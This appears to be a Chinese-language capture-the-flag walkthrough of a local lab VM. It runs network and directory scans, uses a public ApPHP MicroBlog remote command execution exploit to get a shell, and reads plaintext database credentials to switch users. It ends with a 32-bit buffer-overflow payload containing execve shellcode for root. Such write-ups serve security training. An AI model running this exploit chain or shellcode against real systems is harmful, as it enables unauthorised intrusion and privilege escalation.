信息搜集 1 2 3 4 5 6 7 ┌──(root㉿kali)-[~/Desktop/tmp] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered) 192.168.31.2 08:00:27:70:2e:5f PCS Systemtechnik GmbH 192.168.31.159 08:00:27:b3:1b:96 PCS Systemtechnik GmbH
192.168.31.159就是靶机
1 2 3 4 5 6 7 8 9 10 11 12 13 ┌──(root㉿kali)-[~/Desktop/tmp] └─# nmap 192.168.31.159 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 02:36 EDT Nmap scan report for 192.168.31.159 Host is up (0.0013s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 111/tcp open rpcbind 41157/tcp open unknown MAC Address: 08:00:27:B3:1B:96 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
80端口 扫描目录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 ┌──(root㉿kali)-[~/Desktop/tmp] └─# gobuster dir -u "http://192.168.31.159/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-m edium.txt -x .php,.txt,.jpg =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.31.159/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,txt,jpg [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 317] [--> http://192.168.31.159/images/] /.php (Status: 403) [Size: 279] /index.php (Status: 200) [Size: 5656] /docs (Status: 301) [Size: 315] [--> http://192.168.31.159/docs/] /page (Status: 301) [Size: 315] [--> http://192.168.31.159/page/] /header.php (Status: 200) [Size: 13] /admin (Status: 301) [Size: 316] [--> http://192.168.31.159/admin/] /footer.php (Status: 500) [Size: 614] /license (Status: 301) [Size: 318] [--> http://192.168.31.159/license/] /README.txt (Status: 200) [Size: 975] /js (Status: 301) [Size: 313] [--> http://192.168.31.159/js/] /include (Status: 301) [Size: 318] [--> http://192.168.31.159/include/] /backup (Status: 301) [Size: 317] [--> http://192.168.31.159/backup/] /styles (Status: 301) [Size: 317] [--> http://192.168.31.159/styles/] /INSTALL.txt (Status: 200) [Size: 1201] /.php (Status: 403) [Size: 279] /wysiwyg (Status: 301) [Size: 318] [--> http://192.168.31.159/wysiwyg/] /server-status (Status: 403) [Size: 279] /mails (Status: 301) [Size: 316] [--> http://192.168.31.159/mails/]
从/README.txt 得知是ApPHP的框架,mails里有账号和密码,其他的都没什么用
1 2 3 4 5 6 7 8 9 10 11 12 Hello _USER_NAME_!<br> <br> You or someone else asked for your login info on our site, _WEB_SITE_ Your Login Info: ------------------------<br/> Username: _USER_NAME_ Password: _USER_PASSWORD_ ------------------<br/> Best regards, _WEB_SITE_
1 2 3 4 5 6 7 8 9 10 11 12 13 14 ┌──(root㉿kali)-[~/Desktop/tmp] └─# searchsploit apphp -------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------- --------------------------------- ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities | php/webapps/33030.txt ApPHP MicroBlog 1.0.1 - Remote Command Execution | php/webapps/33070.py ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author) | php/webapps/40506.html ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting | php/webapps/40505.txt ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin) | php/webapps/40517.html ApPHP MicroCMS 3.9.5 - Persistent Cross-Site Scripting | php/webapps/40516.txt -------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Papers: No Results
php/webapps/33070.py跑这个脚本就行,然后弹出来一个shell
提权 在/var/www/html/include/base.inc.php里有用户名和密码
1 2 3 4 5 6 7 8 9 10 www-data@debian:/var/www/html/include$ cat base.inc.php <?php // DATABASE CONNECTION INFORMATION define('DATABASE_HOST', 'localhost'); // Database host define('DATABASE_NAME', 'microblog'); // Name of the database to be used define('DATABASE_USERNAME', 'clapton'); // User name for access to database define('DATABASE_PASSWORD', 'yaraklitepe'); // Password for access to database define('DB_ENCRYPT_KEY', 'p52plaiqb8'); // Database encryption key define('DB_PREFIX', 'mb101_'); // Unique prefix of all table names in the database ?>
su clapton
提权root home目录下有input一个程序和一个note
1 2 3 4 5 6 7 clapton@debian:~$ cat note.txt buffer overflow is the way. ( ͡° ͜ʖ ͡°) if you're new on 32bit bof then check these: https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html https://samsclass.info/127/proj/lbuf1.htm
input的伪c代码
1 2 3 4 5 6 7 8 9 10 11 12 int __cdecl main(int argc, const char **argv, const char **envp) { char dest[159]; // [esp+11h] [ebp-9Fh] BYREF if ( argc <= 1 ) { printf("Syntax: %s <input string>\n", *argv); exit(0); } strcpy(dest, argv[1]); return 0; }
二进制我属实不会,看大佬wp了
payload:
1 for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\xa0\xe7\x84\xbf" + "\x90" * 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")')) ; done
